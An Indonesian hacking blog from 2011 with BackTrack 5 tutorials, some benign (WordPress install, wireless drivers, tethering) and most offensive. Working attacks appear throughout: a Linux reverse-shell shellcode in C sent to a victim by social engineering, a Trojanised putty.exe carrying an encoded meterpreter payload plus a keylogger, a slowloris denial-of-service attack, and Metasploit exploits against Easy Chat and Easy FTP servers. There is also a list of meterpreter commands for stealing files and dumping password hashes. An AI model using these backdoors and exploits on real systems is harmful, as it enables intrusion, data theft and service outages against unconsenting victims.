Wednesday, November 23, 2011

Install CMS WOrdpress diBacktrack

Sahabat mungkin pernah ingin menginstall wordpress diBacktrack, tapi binggung cara installnya gmna, kalau diwindows mungkin cara installasinya bisa segampang menekan enter. Kejadian itu jugalah yang menimpa saya saat kelas web karena saya tidak pernah melakukan instalasi wordpress dilinux. Tetapi tidak pernah bukanlah alasan untuk berhenti, saya searching kewebsite mysql dan mendapat pencerahan, berikut tutorial install Wordpress diBacktrack.

1. Jalankan service Apache dan Mysql dari Application > BackTrack > Services.
2. Download Wordpress disini http://wordpress.org/download/
3. Extrack dan copy folder wordpress ke /var/www
4. Buat database dan buat akses kedalamnya.

root@bt:~# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 46
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE DATABASE wordpress;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'toor' WITH GRANT OPTION;
Query OK, 0 rows affected (0.00 sec)

mysql> 


5. Buka browser dan masukan alamat wordpress localhost/wordpress


6. Setting koneksi databasenya dan klik Submit.

Database Name : wordpress (atau database yang kita buat dengna nama yang lain)
User Name : root
Password : toor
Database Host : localhost
Table Prefix : wp_


7. Buka gedit kemudian copy text yang ada didalam kotak simpan dengan nama wp-config.php pada folder /var/www/wordpress klik Run the install.



8. Buka lagi pada browser localhost/wordpress dan isi form tersebut.


9. Siap untuk login.


Semoga tutorial ini membantu sahabat yang kesulitan menginstall wordpress diBacktrack, buat sahabat yang menggunakan OS selain backtrack tutorial ini juga bisa berlaku.

Monday, November 14, 2011

Exploit Linux dengan Backtrack 5

Sebelumnya artikel saya banyak membahas exploitasi kepada windows, saat ini kita akan melakukan exploit terhadap sistem operasi linux, sahabat mungkin merasa bahwa linux sahabat adalah Sistem operasi paling aman sejagat, tapi saya bilang tidak, karena tidak ada sistem yang paling aman didunia ini, paling ngak kalau sistemnya ngak bisa ditembus gunakan saja social engginer, ato culik aja administratornya, trus tanyain deh,hehe.. berikut contoh exploitasinya.

1. Dapatkan kode exploit.

root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
 * linux/x86/shell_reverse_tcp - 71 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=192.168.43.66, LPORT=5050, 
 * ReverseConnectRetries=5, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependChrootBreak=false, AppendExit=false, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework# 


2. Buat file exploit.

buka gedit kemudian copy hasil dari kode exploit yang kita dapatkan.
edit menjadi seperti sibawah ini.

unsigned char buf[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) buf;
(int)(*funct)();
}

simpan dengan nama exploitbacktrack.c


3. Compile file exploit.

root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~# 


4. Gunakan Social Engginer agar file exploit melayang kepada komputer target.

5. Buka terminal baru dan buat listener untuk menunggu file exploit kita dieksekusi.

root@bt:~# nc -lvp 5050

6. Dan Bang bang bang Pawned !!

Saturday, October 29, 2011

Kumpulan Tutorial Exploit


Disela-sela waktu senggang saya sering mengunjungi website exploit-db.com salah satu website arsip untuk ribuan exploits, disana juga ada beberapa papers atau articles yang dapat membantu sahabat untuk lebih memahami tentang Exploitasi. Saya kumpulkan kemudian terutama artikel yang ditulis dalam bahasa Indonesia.

[Indonesian] How to Write Shellcode
[Indonesian] Linux Buffer Overflow Tutorial
[Indonesian] Linux Buffer Overflow Tutorial II
[Indonesian] Linux Buffer Overflow Tutorial III
[Indonesian] Simple Technique for SQLi Form Login Bypass
[Indonesian] Implementasi Pishing Dengan Teknik DNS Spoofing 
[Indonesian] Praktek Stack Buffer Overflow
[Indonesian] Intro To Hack Basic #1
[Indonesian] Devilzc0de E-Magazine #3
[ezine] Code Reborn (Indonesian) 

Artikel ini akan terus diUpdate.

Friday, October 28, 2011

Exploit dengan db_autopwn

Sebelumnya saya pernah menulis tutorial Install Postgresql di Backtrack 5 untuk dapat melakukan serangan menggunakan db_autopwn di Backtrack. Serangan dengan db_autopwn membuat kita menjadi lebih mudah untuk melakukan serangan. Disini saya menggunakan database "msfbook".

1. Jalankan Metasploit.
root@bt:~# msfconsole
2. Lakukan serangan.
msf > db_connect root:toor@127.0.0.1/msfbook
msf > db_nmap IP_TARGET
msf > db_autopwn -p -t -e
msf > sessions -l
msf > sessions -i 1
sangat mudah untuk melakukan serangan, berikut sebuah video yang menunjukan betapa mudahnya melakukannya.






Serangan Dos kepada Webserver

Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, dan harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.

1. Download file lbd.sh dan slowloris.pl disini, kemudian unrar.

2. Cek Load-Balancing dari webserver target.
root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET
Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

root@bt:~/dos# 
Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.

3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET
* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.

Berikut Videonya.








Update !

Mungkin dengan adanya artikel ini akan membuat beberapa webserver dirugikan, berikut beberapa tutorial yang saya kira dapat memberikan sedikit proteksi pada webservernya.

1. http://www.pc-freak.net/blog/protecting-debian-lenny-against-slowloris-denial-of-service-attack-with-mod_antiloris/
2. http://lwn.net/Articles/338407/

Thursday, October 27, 2011

Install postgresql di backtrack 5

Beberapa dari sahabat mungkin pernah mendengar tentang db_autopwn yang biasanya menggunakan postgresql sebagai databasenya untuk melakukan serangan exploit, kelebihan menggunakan db_autopwn adalah kita dapat menggurangi penggunaan waktu untuk melakukan serangan.

root@bt:~# apt-get install libpgsql-ruby postgresql libpq-dev
root@bt:~# su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
exit
sh-4.1$ exit
exit

Dari tutorial diatas kita bisa melihat saya membuat database dengan nama metasploit.

Saya telah menulis tutorial Exploit dengan db_autopwn diblog ini dilengkapi dengan video tutorialnya.

Install Synaptic Package Manager diBacktrack

Buat sahabat yang baru dan biasa menggunakan ubuntu, mungkin akan kesulitan untuk mengatur aplikasi didalam backtrack, oleh karena itu dibutuhkan aplikasi untuk mengatur hal tersebut seperti diubuntu, contohnya Synaptic Package Manager atau Ubuntu Software Center. Maka kita sekarang akan melakukan installasi pada kedua aplikasi tersebut pada Backtrack kita.

1. Install Synaptic Package Manager.
root@bt:~# apt-get install synaptic

Tampilan Synaptic Package Manager pada Backtrack 5 R1.


2. Buka System > Administration > Software Sources, pada tab Ubuntu Software centang semuanya opsi dari Downloadable from the Internet.


3. Install Ubuntu Software Center.
root@bt:~# apt-get install software-center

Tampilan Ubuntu Software Center pada Backtrack 5 R1.


Untuk tutorial install Ubuntu Tweak DiBacktrack bisa dicari pada kotak pencarian.

Monday, October 24, 2011

Ebook Metasploit: The Penetration Tester’s Guide


Metasploit
The Penetration Tester’s Guide

“The best guide to the Metasploit Framework.” —HD Moore, Founder of the Metasploit Project

Metasploit adalah aplikasi yang powerfull digunakan untuk melakukan aksi exploitasi. Digunakan pada semua kalangan mulai dari pemula sampai tingkat yang Profesional. Ebook Metasploit ini sangat berguna bagi sahabat-sahabat yang ingin serius mengeluti dunia exploitasi

Thursday, October 13, 2011

Patch Driver Wireless diBacktrack 5 R1

Beberapa hari yang lalu ane lagi online, berhubung sinyal wireless lagi buruk(udah musin hujan), ane berencana mau keluarin itu wireless adapter yang tipe TL-WN321G, taruh diluar kamar,biar sinyal lebih oke,eh pas ane colokin kelaptop ternyata drivernya belum ada(Untuk versi Backtrack 4 kebawah driver rt73usb sudah disertakan didalamnya), akhirnya ane keliling dunia bersama om google untuk mencari pencerahan, dan akhirnya ketemulah didalam website resmi backtrack tentang patch pada driver wireless.

Sebelumnya ane kasih tau dulu drivers apa aja yang akan support jika dipatch

1. Wireless card yang support Injection
+ AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
+ AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
+ BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
+ Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed
+ Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers-passed
+ ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -passed
+ Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed
+ Ubiquiti SRC - using the mac80211 ath9k drivers-passed
+ Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
+ Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed
+ Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed
+ Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed
+ ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
+ Intel 4956/5xxx - using the iwlagn drivers - passed

2. Wireless Card yang dapat berjalan tanpa Injection
+ Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
+ Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01) 

3. Wireless Card Tidak dapat berfungsi
+ D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail
+ Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail
+ AWUS051NH - fail 

Cara Mempatch bisa dilihat dibawah :

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd/usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2 
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14 
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch 
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch 
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch 
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch 
root@bt:~# make 
root@bt:~# make install
root@bt:~# reboot

Akhirnya ane bisa juga gunain itu wireless adapter, cukup gunakan perintah modprobe [nama_driver] contohnya untuk driver TL-WN321G yang menggunakan driver rt73usb :

modprobe [nama-driver]
modprobe rt73usb

Semoga bermanfaat.
Thank's to Backtrack Wiki.

Tuesday, October 4, 2011

Internetan menggunakan Samsung Galaxy Mini diBacktrack

Kemaren kebetulan wireless diasrama ane lagi error tuh, jadi terpaksa deh ane harus cari cara untuk bisa selancaran sebebas bebasnya didunia maya, pas nga sengaja liat hp(Samsung Galaxy Mini), ane jadi teringat kemaren diwendus sijelek(pacar ane gann,"_") dia bisa internetan pake hp + kabel micro usb, jadi ane yang menggunakan linux ngak mau kalah, ane coba untuk menyambungkan leptop dengan hp, kemudian ane coba-coba dan ternyata berhasil gan,hoho.. ni dibawah caranya :

1. Sambungkan Handphone Galaxy Mini dengan leptop(OS Backtrack)

2. Masuk kedalam pengaturan USB tethering Menu > Settings > Wireless and networks > Tethering and portable hotspot , Kemudian centang USB tethering



3. Buka Wicd Network Manager Applications > Internet > Wicd Network Manager


4. Masuk kedalam pengaturan dan lakukan perubahan pada Network interfaces , pada Wired interface rubah menjadi usb0 kalau gagal pake usb1, klik OK.


5. Kemudian klik tombol Refresh

6. Cek pada kartu jaringan apakah usb0 sudah terdeteksi,jika sudah masuk Wicd Network Manager dan tekan tombol Connect pada Wired Network.


Selamat Berselancar, jangan lupa share y artikelnya,hoho..
thank's to my family
thank's to jelekh
and thank's for u.

Wednesday, September 28, 2011

Install sslstrip di Backtrack 5 R1

Suatu ketika pas ane mau menggunkan sslstrip, ane lupa kalau diBacktrack 5 kan itu aplikasi belum terinstall, oleh karena itu ane mau bantuin agan-agan yang juga punya masalah sama kaya untuk bisa menggunakan sslstrip.


1. Download filenya.
root@bt:~# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz


2. extrack filenya.
root@bt:~# tar zxvf sslstrip-0.9.tar.gz 


3. lakukan instalasi.
root@bt:~# cd sslstrip-0.9
root@bt:~# python setup.py install


4. Selamat menikmati.
root@bt:~# sslstrip


Semoga membantu.

Tuesday, September 27, 2011

Exploit Easy Chat Server v2.2

Sekarang kita akan melakukan Exploitasi terhadap Easy Chat Server v2.2 menggunakan kelemahan pada authentication request request handling buffer overflow dengan exploit efs_easychatserver_username. Tanpa penjelasan yang panjang langsung kita praktekan.

1. Buka Metasploit
msfconsole


2. Jalankan Proses Explotasi.
use exploit/windows/http/efs_easychatserver_username 
set payload windows/shell/bind_tcp 
set rhost IP_Target
exploit


3. Hasilnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Perintah dasar Meterpreter

 Buat agan-agan yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat agan-agan yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho..

1. help
Perintah ' help ' akan menampilkan menu help pada terminal.

2. background
Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

3. ps
Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan.

4. migrate
Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.

5. ls
Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada.

6. download
Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.

7. upload
Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasanya backdoor), dan gunakan double-slashes.

8. ipconfig
Perintah ' ipconfig ' untuk menampilkan kartu jaringan/network interfaces dan alamat korban.

9.  getuid
Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer korban.

10. execute
Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer korban.

11. shell
Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer korban(biasanya command Prompt windows).

12. idletime
Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

13. hasdump
Perintah ' hashdump ' untuk menampilkan data dari SAM file.

14. ?
Perintah ' ? ' adalah untuk menampilkan help dari meterpreter.

15. channel
Perintah ' channel ' untuk menampilkan channel yang sedang aktif.

16. close
Perintah ' close ' untuk keluar dari channel.

17. exit
Perintah ' exit ' untuk keluar dari session yang sedang aktif.

18. interact
Perintah ' interact ' untuk interaksi dengan channel.

19. irb
Perintah ' irb ' untuk menjalankan ruby shell command.

20. quit
Perintah ' quit ' kembali kepada terminal meterpreter dan keluar dari session yang aktif.

21. read
Perintah ' read ' membaca data dari channel.

22. run
Perintah ' run ' untuk dapat menjalankan script meterpreter.

23. write
Perintah ' write ' digunakan untuk menulis kedalam channel.

24. cat
Perintah ' cat ' digunakan untuk membaca sebuah file.


Cukup segini dulu y, karena masih banyak lagi perintah yang harus agan-agan ketahui jika ingin mendapatkan hasil yang maksimal dari sebuah exploitasi. Untuk perintah yang lain agan-agan bisa melihatnya di sini.

Exploit Easy FTP Server v1.7

Ane dapat Tutorial baru nih gan, lumayan nambahin pengetahuan kita-kita diblog ini. FTP Server merupakan sebuah server yang memanfaatkan File Transfer Protocol (FTP) untuk keperluan transfer file antar mesin pada jaringan TCP/IP, disini kita memanfaatkan celah keamanan yang terdapat pada aplikasi Easy FTP Server versi 1.7 pada buffer overflow yang dimana kita dapat memanfaatkannya dengan memasukkan input dalam bentuk exploit sehingga data-data yang disimpan melebihi kapasitas buffer memorinya. Intinya dengan proses tersebut maka kita dapat memasukkan berbagai shellcode untuk dijalankan di server, contohnya bind shell.

1. Buka Metasploit

msfconsole


2. Jalankan Proses Exploitasi

use exploit/windows/ftp/easyftp_cwd_fixret 
set payload windows/shell/bind_tcp
set rhost IP_Target
exploit


3. Dan dapatkan shellnya.


Note : Tehnik ini telah dicoba dan berjalan pada windows XP sp 1, Windows XP sp 2, Windows XP sp 3, Windows 7.

Bugs & Fixes Backtrack 5 R1 [Sound]

Kalau agan-agan menggunkan Backtrack 5 atau pun yang R1 mungkin telah menemukan bahwa fungsi sound tidak berfungsi dengan baik, oleh karena itu mari kita selesaikan disini.

1. Pergi ke System > Preferences > Startup Application



2. Kemudian Klik Add dan masukan Konfigurasi dibawah ini.

Name : Pulseaudio daemon
Command :/usr/bin/pulseaudio
Comment : Start the sound daemon


Logout dan Login kembali, selamat menikmati musik.

Monday, September 26, 2011

Membuat Screen Lock DiBacktrack

Kalau agan-agan pernah pake ubuntu, kan kalau mau setting ScreenLock bisa disetting diScreenSaver tuh, berhubung diBacktrack paket bawaan nya tidak menyertakan ScreenSaver ane memutuskan untuk membuatnya.Check It Out gan.

1. Install xlockmore

apt-get install xlockmore


2. Masuk kedalam pengaturan shortcut di System > Preferences > Keyboard Shortcuts


3. Cari Action Lock Screen dan disable


4. Kemudian klik tombol add untuk menambahkan shortcut baru


5. Isi Name : Lock Screen dan Command : xlock kemudian klik Apply


6. klik Shortcut yang baru kita buat kemudian tekan Ctrl + Alt + L untuk shortcut keyboard.


7. Ini hasilnya gan.

Tuesday, September 20, 2011

Membuat backdoor dengan x86/shikata_ga_nai

Kalau agan-agan berpikir Windows 7 itu ngak bisa diexploit, agan salah besar karena ada banyak cara yang dilakukan untuk bisa melakukan exploitasi terhadap sebuah Operasi Sistem, sekarang kita akan melakukan exploitasi terhadap Windows Xp dan 7, ditambah lagi cara untuk melakukan rekaman terhadap ketikan keyboard(keylogger) melalui meterpreter.Check it Out.

1. Cari file yang akan kalian gunakan untuk memancing target mengeksekusi file tersebut. Disini ane menggunakan file putty.exe, jadi download dulu y.

root@bt:~# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


2. Infeksi file yang akan dieksekusi dengan payload exploit.rubah nama putty.exe manjadi putty_pro.exe dan gunakan exploit x86/shikata_ga_nai,buat yang master udah ngertilah.

root@bt:/# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.125 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5


3. Jalankan Metasploit dan buat listener agar ketika file yang kita buat diatas dieksekusi meterpreter akan langsung terbuka.

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
exploit


4. Entah bagaimana caranya copy file yang sudah diinfeksi diatas kedalam komputer korban,entah bagaimana caranya[usaha itu perlu bro].Ketika file dieksekusi maka secara otomatis meterpreter akan terbuka.sekarang terserah kalian mau diapakan komputer itu.



note : komputer kita dengan target akan hilang koneksi ketika file yang dieksekusi ditutup[dicobain biar tau].


5. Plus dari ane adalah merecord semua ketikan dari keyboard.Gunakan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump. Pawned !

Windows XP :



Windows 7 :



Semoga tutorial ini bisa membantu temen-temen yang kesulitan mencari tutorial.

 
biz.